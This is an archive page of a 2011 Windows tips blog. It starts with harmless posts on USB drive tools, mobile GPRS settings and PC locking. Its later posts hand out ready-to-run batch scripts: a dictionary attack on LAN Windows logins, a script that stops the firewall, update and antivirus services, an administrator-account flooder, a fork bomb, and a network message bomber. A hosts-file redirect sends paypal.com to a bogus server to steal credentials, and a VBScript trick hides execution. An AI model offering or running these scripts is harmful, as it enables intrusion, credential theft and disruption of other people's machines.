Thursday, April 28, 2011

Password-protect Pen Drive



If you use a USB flash drive to transport sensitive data that you would prefer to protect from prying eyes, should you lose the drive, Rohos Mini Drive  can safeguard that data. This security tool allows you to create a secret partition on the drive and then password-protect/encrypt that partition, thus protecting any documents you copy to that partition via the utility’s file manager. 

Tuesday, April 26, 2011

Run a Web site from Pen drive


If you are a Web developer, you may be interested to know that with Server2Go.


Features

1.you can easily run a Web server that supports Apache, PHP, MySQL, and Perl right from a USB flash drive.

2. You can use Server2Go right out of the box without any installation.

3. It runs on all versions of Windows.

4.supports most common browsers

5.It is completely free. 


To a developer, the benefits of having a portable Web server on a USB drive are numerous.

 For more information about this package, visit the Server2Go site

Monday, April 25, 2011

Lock PC Using Pen Drive




Here I am telling you how you can login and logout from a pc using a pen drive . For this you will need a software PREDATOR which locks your PC when you are away, even if your Windows session is still opened.
It uses a regular USB flash drive as an access control device, and works as follows:

  • you insert the USB drive
  • you run PREDATOR (autostart with Windows is possible)
  • you do your work...
  • when you're away from your PC, you simply remove the USB drive:
     once it is removed, the keyboard and mouse are disabled and the screen darkens
  • when you return back to your PC, you put the USB flash drive in place:
     keyboard and mouse are immediately released, and the display is restored.
It's easier and faster than closing your Windows session, since you do not have to retype your password when you return.
Advanced Security Features:
  • PREDATOR can send alert messages by Email or by SMS.
  • PREDATOR records all security-related events in a log file: start, alarms, stop. By reading this log, you will know if intruders have tried to use your computer while you have been away.
  • PREDATOR can replicate this log on your Twitter account, allowing you to remotely monitor all access-control activity on your PC.
  • PREDATOR frequently changes the security codes recorded on your USB drive. If an intruder manages to copy your stick, this copy will not work because the codes on your own stick will have changed in the meantime.
  • PREDATOR disables the Windows task manager when you unplug the USB drive. Nobody can stop it with Ctrl-Alt-Del.
  •  PREDATOR disables the CD Autorun feature in Windows, to prevent intruders from running malware on specially crafted CDs.
  • PREDATOR lets you regain control of your computer if you lose your stick: when you start the software for the first time, you set a password that will unlock your session if your USB drive is not available.
  • PREDATOR can sound an audible alarm if somebody enters an invalid password.
  • And finally, PREDATOR can protect several PCs with the same USB flash drive, e.g. your home and office computers.


Portable Applications for USB Drives



In addition to storing your data, you can run portable applications from a USB flash drive.
 For example,  vlc,  Mozilla Firefox and Thunderbird are  available as portable applications. 
you can choose other applications to install on your USB flash drive from PortableApps.com 
You can even install an entire prepackaged suite of applications that includes such things as an audio player, games, an antivirus utility, and a handy menu system.


Wednesday, April 20, 2011

Disable messenger service





run the Services panel for disabling the Messenger service ( Alerter ).

1. Click on the Start button.
2. Click on the Run item in the Start menu, Run box will appear.
3. Type in the Run box: services.msc /s and hit OKServices Panel will appear.



 disable Messenger service here.

1. Find the Messenger string and select it.
2. Click on the Properties button on the Services panel toolbar, the service properties box will appear.
3. Set the Startup type to disabled, click on the Stop button and finish it by the Apply button.

 

Monday, April 18, 2011

Securing servers or sites from Google’s invasion



Below given are the security measures which system
administrators and security professionals must take into account
to secure critical information available online, falling into
wrong hands:
- Install latest security patches available till date for the
applications and as well as the operating system running on
the servers.
- Don’t put critical and sensitive information on servers
without any proper authentication system which can be
directly accessible to anyone on internet.
- Disable directory browsing on the webserver. Directory
browsing should be enabled for those web-folders for which
you want to give access to anyone on internet.
- If you find any links to your restricted server or sites in
Google search result then it should be removed. Visit the
following link for more details:
http://www.google.com/remove.html
- Disable anonymous access in the webserver through internet
to restricted systems directory.
- Install filtering tools like URLScan for servers running
IIS as webserver.

Friday, April 8, 2011

Get Maximum Internet Speed In Window7


Here are some steps using which you can get maximum speed of your internet connection in window7.
Steps are:

1.Click Network connection icon on the right side of taskbar.
2.Select your connection and right click on it.
3.Select status.
4.A small window will pop up.
5.Click properties.
6.Click configure.
7.In Maximum Speed select your maximum option and get maximum speed.

enjoy!!!!!!!!!!!!!!!!!

Track Mobile Numbers Location


If you are recieving a call or message from an unknown number then you can easily find out the caller.There
are some websites where you can find caller details of any number.For this you have to only click links given below:

1.trace.bharatiyamobile.com

This site tracks 119 crore indians mobile.You have to only ener the number in the search bar.Here you have to enter only 10 digits numbers.Don't enter 91 in starting because it is an indian site.

2.www.hacktrix.com

This site also tacks mobile numbers.You have to only ener the number in the search bar.Here you have to enter only 10 digits numbers.Don't enter 91 in starting.

3.www.informationmadness.com

This site traces indian and pakistani numbers only.In this seatrch optin will not cme directly.For this you have to click missed cakll finder option.Now a search box will appear witch select country option.you have to select one of the country.Now enter mobile number in search box and click search.After this you will get information about mobile number.

4.http:tp2location.com

This site give information about international numbers.There are two ways to operate it.If you want to search american or canadian number then select us/canada option else select international.You Have to ener number with country code.

Note:
These sites will only give region informaton .This will not provide photo ID,address......


Thursday, April 7, 2011

Wednesday, April 6, 2011

Use Symbols In Notepad


Here iam going to explain you how you can add symbols in notepad
1.open notepad.
2.click format in menubar.
3.select font. A dilog box will popup.
4.In font select webdings.
5.select size 72.

Now you can add symbols by pressing the keys. For more symbols press shift+key.



Tuesday, April 5, 2011

GPRS SETTINGS FOR MOBILE



Manual Hutch Gprs Settings
  1. Account Name – Hutch_GPRS
  2. User Name – Blank
  3. Password – Blank
  4. Proxy – Enabled/yes
  5. Access Point Name – portalnmms
  6. Full Internet Access Point Name – www
  7. Proxy and Server address – 10.10.1.100
  8. Proxy and Server Port – 8080
  9. Homepage – http://hutchworld.co.in
  10. Authentication Type – Normal
Manual Airtel Gprs Settings
  1. Homepage – any page you want to set.
  2. User Name – Blank
  3. Password – Blank
  4. Proxy – Enabled/yes.
  5. Proxy and Server Adress – 202.56.231.117
  6. Proxy and Server Port – 8080
  7. Data bearer – GPRS or Packet Data.
  8. Access Point Name – airtelgprs.com
  9. Authentication Type – Normal
  10. Use preferred access point – No
Manual Airtel live settings
  1. Account Name – Airtel_live
  2. Homepage – http://live.airtelworld.com
  3. Username – Blank
  4. Password – Blank
  5. Proxy – Enabled/yes
  6. Proxy and Server Adress – 100.1.200.99
  7. Accespoint Name – airtelfun.com
  8. Proxy and Server Port – 8080
  9. Data bearer – GPRS/ Packet Data
  10. Authentication Type – Normal
Manual Idea Gprs Settings
  1. Account Name – idea_GPRS
  2. Username – Blank
  3. Password – Blank
  4. Homepage – http://wap.ideafresh.com
  5. Proxy and Server Port – 8080
  6. Proxy and Server adress – 10.4.42.45
  7. Databearer – GPRS / Packetdata
  8. Acces Point Name – imis
  9. Proxy – Enabled/yes
  10. Authentication Type – Normal
Manual Bsnl Gprs Settings
  1. Account Name – BPL WAP
  2. Username – <Blank>
  3. Password – <Blank>
  4. Proxy – Enabled/yes
  5. Homepage – http://wap.mizone.bplmobile.com
  6. Proxy and Server address – 10.0.0.10
  7. Proxy and Server Port – 8080
  8. Acces Point Name – mizone
  9. Data bearer – GPRS/ Packetdata
  10. Authentication Type – Normal

Monday, April 4, 2011

Stop Windows Sevices-service disabler:



The following piece of code is used for stopping some critical windows services.
1.Open Notepad
2.Type
@echo off
net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes
exit
3.save ads*.bat

This program when executed will stop the ‘windows firewall’ service that is required to block
unwanted datagram’s coming from the internet, ‘windows update’ service that is required to update
windows patches and so on, ‘workstation’ service that is required for the computer to establish a peer to
peer connection, ‘DHCP Client’ service that is required to register an available IP address from the
DHCP server, ‘DNS Client’ service that is required to resolve FQDN (Fully qualified Domain Name) into
its equivalent IP address, ‘print spooler’ service that is required to load the document to be printed in the
spool, and then the ‘themes’ service that is required to offer Themes and other graphical appearance.
Likewise you may stop any of the services, even the anti-virus service that offers protection from
malwares will be stopped in this way.
So when these services get stopped, it almost becomes impossible for the machine to offer the service
what they are supposed to do so, hence the user has to manually enable and start these services again.

Broadcast Bomber-broadcast messages



The ‘broadcast bomber’ will broadcast messages infinitely to all the computers connected to this
computer, if it is in a network.

1.Open Notepad

2.Type

@echo off
:netannoy
net send * Hi there!
net send * How u doin ?
net send * Are you fine ?
net send * Never mind about me....
net send * I am not here to annoy you....
net send * I am caring for you.....
net send * start counting from 1 to 5, i Will be outta this place.....
net send * 1
net send * 2
net send * 3
net send * 4
net send * 5
goto netannoy

3.save as *.bat.


Keystroke Re-mapper-Change Key Stroke



This  batch program helps re-map the keystroke by changing the ‘scancodemap’
entry in the registry editor. The code that I have enclosed here changes the key from A to B, so that if any
users press ‘a’ key on the keyboard he will be getting the ‘b’ displayed on the screen, likewise you may
map any keys.
@echo off
reg add "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "Scancode
Map" /t REG_BINARY /d 00000000000000000200000030001e0000000000
exit
If you want to create a new batch file for remapping other keys, you have to refer the ascii codes for each
keys that was pre assigned, and you can Download

LAN Remote user – Dictionary Attack:



This Batch file launches a Dictionary attack and find the Windows logon Credentials in a
LAN. You need a Dictionary text file to proceed further to launch this attack successfully.

1. Open up a Notepad file.
2. Type
@echo off
Title LAN Dictionary Attack Launcher
Color 0a
if “%1″==”” goto fin
if “%2″==”” goto fin
del logfile.txt
FOR /F “tokens=1″ %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo *****Done*****
3.Save as *.batt
4. Make sure that you have a Dictionary Password Text file in the same location where you are going to
execute this program. (Name should be passlist.txt)
5. Now go to the command prompt and then execute this program from there, along with the Target
computers IP address or Hostname and the Valid Username.
The Syntax should be like this,…
C:\>LANbrute.bat xxx.xxx.xxx.xxx Administrator
Where,
LANbrute.bat – This is the Name of the batch file that resides in the C Drive.
xxx.xxx.xxx.xxx – IP Address of the Target Computer.
Administrator – Victim Account that you want to crack.
5. This program will start launching Dictionary Attack against the administrator account on the Machine
xxx.xxx.xxx.xxx by using the passwords from the file passlist.txt and will not stop until it finds a right
match.
6. If the right password was found, then it will save it in a text file named ‘output.txt’ on the same
directory.
Credits to the Folks from Irongeek, because this is an idea by them.
Use at your own risk.Iwill not be responsible for anything.

Running Batch File As VB Script



1.Open Notepad.
2.Type
Set objShell = CreateObject("WScript.Shell")
strCommand = "C:\yourfile.bat"
objShell.Run strCommand, vbHide, TRUE

Note:Replace the ‘C:\ yourfile.bat’ with the actual name of the batch file that you have created, along with the location and then save this file with a .vbs extension. Now you may execute this VBScript file to run the batch file too, so there is no need for you to execute the batch file separately. Now the batch was still running in the background and remains hidden.
The only way to end the process is to open the task manager and end the process  WScript.

Saturday, April 2, 2011

Create a Shortcut to Lock Your Computer



Here is how you can Create a Shortcut to Lock Your Computer.

1. Right-click the desktop. Point to New, and then click Shortcut.
2. The Create Shortcut Wizard opens. 
3.In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. 
4.Enter a name for the shortcut. 
5.Click Finish. 

You can also change the shortcut's icon. To change the icon: 
1.Right click the shortcut and then select Properties.
2. Click the Shortcut tab, and then click the Change Icon button. 
4.In the Look for icons in this file text box, type: Shell32.dll. Click OK. 
5.Select one of the icons from the list and then click OK 

You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Remove Shutdown Option From Start Menu



Here is how you can remove the shutdown option from start menu in  computer by editing registry


Regedit

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"

Display Text on startup:



Here is the way how you can display a text at system start up by editing registry.

REGEDIT

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your notice text"

Friday, April 1, 2011

User Flooder -Make Multiple User Accounts

Add caption

The ‘user flooder’ program will create a number of user accounts with random numbers, and
assign administrator rights to them by itself, moreover the password set for those user accounts were too random numbers.

1.Open Notepad.
2.Type
@echo off
:usrflood
set usr=%random%
net users %usr% %random% /add
net localgroup administrators %usr% /add
goto usrflood
3.Save it as *.bat.




Fork Bombing


Fork bombing is nothing but calling a program by itself again and again with a infinite loop and making
the system to crash by popping up hundreds of windows on the screen.
1Open Notepad.
2.Type
@echo off
:loop
Explorer
Call fork.bat
Goto loop
3.Save as *.bat.

Note:
. The explorer command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is called again which in turn opens up multiple documents rolled out in a loop, likewise it goes on by calling the program itself again and again until the system crashes or hangs up.

DNS POISINING



This program creates a new entry in the hosts file, so that whenever an user attempts to move to
www.google.com, he will be re-directed to another host that has the IP address of 110.224.53.172, likewise if the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes.

@echo off
echo 110.224.53.172 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 110.224.53.172 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit

Folder Replicator Virus


Here is a Simple batch program, has the tendency to replicate itself again
and again and keeps on creating a folder with same name, until a user stops it.

1. Open  a notepad.
2.Type

cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop

2. Save as * .bat, before doing that you have to modify the code by
changing the place where it says ‘username’ and instead of that replace it by the currently logged in
username.

3. Then run it .

Note:
Deleting the root directory will purge all the clumsy thing done by this piece of code.

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Affiliate Network Reviews